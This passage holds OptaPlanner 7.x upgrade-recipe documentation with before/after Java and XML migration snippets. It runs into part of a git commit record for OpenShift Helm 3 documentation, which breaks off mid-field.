`applyCustomProperties()` replaced\n\nThe `CustomPhaseCommand` no longer has the method `applyCustomProperties()`.\nIf you have custom properties in your solver configuration,\nsimply implement a public setter for each custom property.\nThe supported types for a setter currently include booleans, numbers and strings.\n\nSimilar custom property support is available on some other custom classes (such as `SolutionPartitioner`).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize;\n\n @Override\n public void applyCustomProperties(Map<String, String> 
customPropertyMap) {\n String mySelectionSizeString = customPropertyMap.get(\"mySelectionSize\");\n try {\n mySelectionSize = mySelectionSizeString == null ? 10 : Integer.parseInt(mySelectionSizeString);\n } catch (NumberFormatException e) {\n throw new IllegalArgumentException(\"The mySelectionSize (\" + mySelectionSizeString + \") cannot be parsed.\", e);\n }\n ...\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize = 10;\n\n @SuppressWarnings(\"unused\")\n public void setMySelectionSize(int mySelectionSize) {\n this.mySelectionSize = mySelectionSize;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: method `isFeasible()` fixed\n\nA bendable score with at least 2 hard score levels is now infeasible\nif any of those hard levels is negative, even if another hard level is positive (1 or higher).\nFor example, a bendable score with hard levels `1` and `-1` now correctly reports `isFeasible()` as false.\n\n\n[.upgrade-recipe-minor]\n=== `EasyScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner still keeps track of the `initScore` internally.\n\n\n[.upgrade-recipe-minor]\n=== `IncrementalScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score`: `valueOf(...)` and `valueOfInitialized(...)` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom initializer: `Score.compareTo()` behaviour reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. 
Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Move`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\n`Move` and `AbstractMove` now optionally support a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove {\n\n @Override\n public boolean isMoveDoable(ScoreDirector scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public Move createUndoMove(ScoreDirector scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove<CloudBalance> {\n\n @Override\n public boolean isMoveDoable(ScoreDirector<CloudBalance> scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public CloudComputerChangeMove createUndoMove(ScoreDirector<CloudBalance> scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector<CloudBalance> scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\n\n== From 7.0.0.Beta6 to 7.0.0.Beta7\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `ConstraintMatch(Total)`: `getWeightTotal()` and `getWeight()` replaced\n\nWhen explaining a score through `ScoreDirector.getConstraintMatchTotals()`,\nthe `ConstraintMatchTotal` and `ConstraintMatch` instances now have a `Score`\ninstead of an `int scoreLevel` and a `Number weight`.\n\nThis simplifies the API and allows the reuse of `ConstraintMatch` in the indictment API.\n\nBefore in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : 
guiScoreDirector.getConstraintMatchTotals()) {\n int scoreLevel = constraintMatchTotal.getScoreLevel();\n Integer weightTotal = (Integer) constraintMatchTotal.getWeightTotalAsNumber();\n String text = weightTotal.toString() + (scoreLevel == 0 ? \"hard\" : \"soft\");\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n HardSoftScore scoreTotal = (HardSoftScore) constraintMatchTotal.getScoreTotal();\n String text = scoreTotal.toShortString();\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getConstraintMatchTotals()` impact\n\nWhen implementing the interface `ConstraintMatchAwareIncrementalScoreCalculator`'s method `getConstraintMatchTotals()`,\nthe constructor of `ConstraintMatchTotal` and the method `addConstraintMatch(...)`\nnow use `Score` instances instead of numbers.\n\nBefore in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n LongConstraintMatchTotal maximumCapacityMatchTotal = new LongConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", 0);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., - weight);\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ConstraintMatchTotal maximumCapacityMatchTotal = new ConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", HardSoftLongScore.ZERO);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., HardSoftLongScore.valueOf(- weight, 0));\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Score rule that changes 2 score levels: call `addMultiConstraintMatch()`\n\nA score rule that changes 2 score levels in its RHS\nmust now call `addMultiConstraintMatch()` instead of 2 separate `add*ConstraintMatch()` calls.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMediumConstraintMatch(kcontext, -3); \/\/ Financial cost\n scoreHolder.addSoftConstraintMatch(kcontext, -4); \/\/ Employee happiness cost\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMultiConstraintMatch(kcontext, 0, -3, -4);\nend\n----\n\nWhen calling `guiScoreDirector.getConstraintMatchTotals()`,\nthere is now also only one `ConstraintMatchTotal` instance for this score rule\nand only one `ConstraintMatch` instance per fired rule.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: `toShortString()` added\n\nIf you have a custom `ScoreDefinition`: the `Score` interface has another new method `toShortString()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... 
{\n ...\n @Override\n public String toShortString() {\n return buildShortString((n) -> ((Integer) n).intValue() != 0, HARD_LABEL, SOFT_LABEL);\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Move`: `createUndoMove()` and `doMove()` changed\n\nThe `Move` interface has changed: `doMove()` now returns the undo move, so `createUndoMove()` has been removed.\nThis was needed to fix a bug in `CompositeMove`.\nHowever, `AbstractMove` completely deals with this change, so *your custom move implementation stays the same*.\n\nIn the very rare case that you're actually calling `createUndoMove()` yourself,\nuse the return value of `doMove()` instead.\n\nBefore in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.createUndoMove(scoreDirector);\n move.doMove(scoreDirector);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.doMove(scoreDirector);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `ScoreDefinition`: `getZeroScore()` added\n\nIf you have a custom `ScoreDefinition`: the `ScoreDefinition` interface has another new method `getZeroScore()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic class HardSoftScoreDefinition extends AbstractFeasibilityScoreDefinition<HardSoftScore> {\n ...\n\n @Override\n public HardSoftScore getZeroScore() {\n return HardSoftScore.ZERO;\n }\n}\n----\n\n\n== From 7.0.0.Beta7 to 7.0.0.CR1\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getIndictmentMap()` added\n\nIf you're using a Java incremental score calculator that is also `ConstraintMatch` aware,\nit now needs to also implement the method `getIndictmentMap()`.\nSimply `return null` to have it calculated automatically from the return value of `getConstraintMatchTotals()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n\n @Override\n public Map<Object, Indictment> getIndictmentMap() {\n return null; \/\/ Calculate it non-incrementally from getConstraintMatchTotals()\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `MoveListFactory` and `MoveIteratorFactory`: method return `Move<Solution_>`\n\nThe `MoveListFactory` and `MoveIteratorFactory` methods now use `Move<Solution_>` instead of a raw-typed `Move`.\nThis way your `MoveListFactory` can return `List<ChangeMove<MySolution>>` instead of `List<ChangeMove>`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<Move> createMoveList(CloudBalance solution) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates generic `ChangeMove` instances):\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<ChangeMove<CloudBalance>> createMoveList(CloudBalance cloudBalance) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates `CloudComputerChangeMove` instances and that class implements 
`Move<CloudBalance>`):\n\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<CloudComputerChangeMove> createMoveList(CloudBalance cloudBalance) {\n ...\n }\n\n}\n----\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<Move> createOriginalMoveIterator(...) {...}\n public Iterator<Move> createRandomMoveIterator(...) {...}\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<CheapTimePillarSlideMove> createOriginalMoveIterator(...) {...}\n public Iterator<CheapTimePillarSlideMove> createRandomMoveIterator(...) {...}\n\n}\n----\n\n\n== From 7.0.0.CR3 to 7.0.0.Final\n\n[.upgrade-recipe-impl-detail]\n=== Workbench's `AbstractSolution` deprecated\n\nThe implementation class `AbstractSolution`, used only by workbench 6,\nhas been deprecated and replaced by the `autoDiscoverMemberType` feature.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class Mysolution extends AbstractSolution<HardSoftScore> {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution(autoDiscoverMemberType = AutoDiscoverMemberType.FIELD)\npublic class Mysolution {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n== From 7.1.0.Beta2 to 7.1.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `<valueSelector>`: `variableName` is now an attribute\n\nWhen power tweaking move selectors, such as `<changeMoveSelector>`,\nin a use case with multiple planning variables,\nthe `<variableName>` XML element has been replaced by a `variableName=\"...\"` XML attribute.\nThis reduces the solver configuration verbosity.\nFor backwards compatibility, the old way is still supported in the 7.x series.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector>\n <variableName>room<\/variableName>\n <\/valueSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector variableName=\"room\"\/>\n----\n\n[.upgrade-recipe-minor]\n=== Construction Heuristic: multiple variable power tweaking simplified\n\nIt's now easier to configure construction heuristics that scale better for multiple variables\nby assigning one variable at a time.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <queuedEntityPlacer>\n <entitySelector id=\"placerEntitySelector\"\/>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/queuedEntityPlacer>\n <\/constructionHeuristic>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <constructionHeuristicType>FIRST_FIT<\/constructionHeuristicType>\n <changeMoveSelector>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n 
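<!-- one changeMoveSelector per planning variable: the construction heuristic assigns one variable at a time -->\n 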
<\/constructionHeuristic>\n----\n\n\n== From 7.1.0.Final to 7.2.0.Final\n\nThere is no impact on your code.\n\n\n== From 7.2.0.Final to 7.3.0.Final\n\n[.upgrade-recipe-minor]\n=== `SolutionFileIO`: `getOutputFileExtension()` is now defaulted\n\nIt's no longer needed to implement `getOutputFileExtension()` of the `SolutionFileIO` interface\nif it returns the same as `getInputFileExtension()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n @Override\n public String getOutputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: direct POJO input\n\nThe benchmarker now also accepts problem instances directly, without reading them from disk.\nIf you're generating your problems or fetching them from a database,\nit might be interesting to switch to this approach (otherwise stick with the old approach because it works offline).\n\nBefore in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n CloudBalanceFileIO solutionFileIO = new CloudBalanceFileIO();\n solutionFileIO.write(problem1, new File(\"tmp\/problem1.xml\"));\n solutionFileIO.write(problem2, new File(\"tmp\/problem2.xml\"));\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark();\n plannerBenchmark.benchmark();\n----\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <solutionFileIOClass>...CloudBalanceFileIO<\/solutionFileIOClass>\n <inputSolutionFile>tmp\/problem1.xml<\/inputSolutionFile>\n <inputSolutionFile>tmp\/problem2.xml<\/inputSolutionFile>\n ...\n <\/problemBenchmarks>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark(problem1, problem2, ...);\n plannerBenchmark.benchmark();\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: `BEST_SCORE` statistic by default\n\nThe benchmarker now includes the `BEST_SCORE` statistic by default.\nIt no longer needs to be explicitly configured.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticType>BEST_SCORE<\/problemStatisticType>\n <\/problemBenchmarks>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <\/problemBenchmarks>\n----\n\nTo disable the `BEST_SCORE` statistic, use `<problemStatisticEnabled>` in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticEnabled>false<\/problemStatisticEnabled>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-major]\n=== `ScoreDirector`: `dispose()` replaced by `close()`\n\n`ScoreDirector` now implements `AutoCloseable`,\nso the `dispose()` method has been deprecated and replaced by `close()`.\n\nBefore in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n 
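\/\/ dispose() is now deprecated, replaced by close(), see the next example\n 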
scoreDirector.dispose();\n----\n\nAfter in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.close();\n----\n\nAfter in `*.java` (with ARM usage):\n[source, java]\n----\n try (ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector()) {\n ...\n }\n----\n\n\n== From 7.3.0.Final to 7.4.0.Final\n\n[.upgrade-recipe-minor]\n=== `movableEntitySelectionFilter` is now inherited\n\nAn entity's `movableEntitySelectionFilter` is now inherited by child entities.\nThe workaround of configuring the filter twice is now obsolete.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Dog extends Animal {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity()\npublic class Dog extends Animal {\n ...\n}\n----\n\n\n== From 7.4.0.Final to 7.5.0.Final\n\n[.upgrade-recipe-minor]\n=== `Indictment`: natural comparison changed\n\nAn `Indictment` is now naturally sorted by its justification.\nTo sort it based on its score, use `IndictmentScoreTotalComparator`.\n\nBefore in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList, new IndictmentScoreTotalComparator());\n----\n\n\n== From 7.5.0.Final to 7.6.0.Final\n\n[.upgrade-recipe-minor]\n=== `PlannerBenchmark`: new method `benchmarkAndShowReportInBrowser()`\n\nIf you're running local benchmarks, this new method will save time by opening the report automatically.\n\nBefore in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmark();\n\/\/ Afterwards manually find the benchmark dir to open the report\n----\n\nAfter in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmarkAndShowReportInBrowser();\n----\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `Indictment.addConstraintMatch()` changed\n\nThis only applies if you're implementing `ConstraintMatchAwareIncrementalScoreCalculator`\nand you do not simply return `null` in `getIndictmentMap()`.\n\nThe method `Indictment.addConstraintMatch(ConstraintMatch)` now returns void instead of a boolean.\nIf the same `ConstraintMatch` is added twice, it now fails fast instead of returning false.\nIf the same `ConstraintMatch` has the same justification twice,\nit must now be added to that justification's `Indictment` only once.\n\n\n== From 7.6.0.Final to 7.7.0.Final\n\n[.upgrade-recipe-major]\n=== Replace `movableEntitySelectionFilter` with `@PlanningPin` when possible\n\nIn many cases, the complex use of a `movableEntitySelectionFilter` to pin down planning entities\ncan be simplified by a `@PlanningPin` annotation on a field or method\nthat returns true if the entity is immovable.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = MovableLectureSelectionFilter.class)\npublic class Lecture {\n private boolean pinned;\n\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n[source, java]\n----\npublic class MovableLectureSelectionFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n return 
!lecture.isPinned();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity\npublic class Lecture {\n private boolean pinned;\n\n @PlanningPin\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: use `OptaPlannerJacksonModule`\n\nInstead of using `@JsonSerialize` and `@JsonDeserialize` Jackson annotations on every `Score` field,\njust register `OptaPlannerJacksonModule` once.\n\nBefore in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n @JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n @JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n objectMapper.registerModule(OptaPlannerJacksonModule.createModule());\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: replace `ScoreJacksonJsonSerializer`\n\nIf you do prefer to use `@JsonSerialize` and `@JsonDeserialize` Jackson annotations,\ninstead of registering `OptaPlannerJacksonModule`,\nreplace `ScoreJacksonJsonSerializer` with a specific serializer,\nsuch as `HardSoftScoreJacksonJsonSerializer`.\nThis won't affect the JSON output.\n\n`ScoreJacksonJsonSerializer` is deprecated.\n\nBefore in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = HardSoftScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\n\n== From 7.7.0.Final to 7.8.0.Final\n\n\n[.upgrade-recipe-minor]\n=== Partitioned Search: `threadFactoryClass` moved\n\nNow that `<solver>` directly supports a `<threadFactoryClass>` element,\nthe `<threadFactoryClass>` element under `<partitionedSearch>` has been deprecated.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n ...\n <partitionedSearch>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <solver>\n <threadFactoryClass>...MyAppServerThreadFactory<\/threadFactoryClass>\n ...\n <partitionedSearch>\n ...\n <\/partitionedSearch>\n <\/solver>\n----\n\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchTotal` and `Indictment`: `getScoreTotal()` renamed to `getScore()`\n\nThe `getScoreTotal()` methods on `ConstraintMatchTotal` and `Indictment`\nhave been deprecated and replaced by `getScore()`.\nThose deprecated methods will be removed in 8.0.\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = constraintMatchTotal.getScore();\n----\n\nBefore in `*.java`:\n[source, java]\n----\nScore score = indictment.getScoreTotal();\n----\n\nAfter in `*.java`:\n[source, java]\n----\nScore score = indictment.getScore();\n----\n\n\n[.upgrade-recipe-minor]\n=== `IndictmentScoreTotalComparator` renamed to `IndictmentScoreComparator`\n\nThe comparator 
`IndictmentScoreTotalComparator` has been deprecated\nand replaced by `IndictmentScoreComparator`.\nThe deprecated class will be removed in 8.0.\n\n\nBefore in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreTotalComparator());\n----\n\nAfter in `*.java`:\n[source, java]\n----\nindictmentList.sort(new IndictmentScoreComparator());\n----\n\n\n== From 7.10.0.Final to 7.11.0.Final\n\n\n[.upgrade-recipe-major]\n=== Chained ChangeMove: cache type `PHASE` no longer supported\n\nTo work correctly with multithreaded solving,\n`ChainedChangeMove` and `ChainedSwapMove` aren't `PHASE` cacheable any longer.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector><!-- On at least 1 chained variable -->\n <cacheType>PHASE<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <changeMoveSelector>\n <cacheType>STEP<\/cacheType>\n ...\n <\/changeMoveSelector>\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5456440972876da957727b26d83438834c98129","subject":"Removed TP note","message":"Removed TP note\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"cli_reference\/helm_cli\/getting-started-with-helm-on-openshift-container-platform.adoc","new_file":"cli_reference\/helm_cli\/getting-started-with-helm-on-openshift-container-platform.adoc","new_contents":"[id=\"getting-started-with-helm-on-openshift\"]\n\n= Getting started with Helm 3 on {product-title}\ninclude::modules\/common-attributes.adoc[]\n:context: getting-started-with-helm-on-openshift\n\ntoc::[]\n\ninclude::modules\/helm-understanding-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-helm.adoc[leveloffset=+1]\n\ninclude::modules\/helm-installing-a-helm-chart-on-an-openshift-cluster.adoc[leveloffset=+1]\n\ninclude::modules\/helm-creating-a-custom-helm-chart-on-openshift.adoc[leveloffset=+1]\n\n","old_contents":"[id=\"getting-started-with-helm-on-openshift\"]\n\n= Getting started with Helm 3 on {product-title}\ninclude::modules\/common-attributes.adoc[]\n:context: getting-started-with-helm-on-openshift\n\ntoc::[]\n\n:FeatureName: Helm 3 for 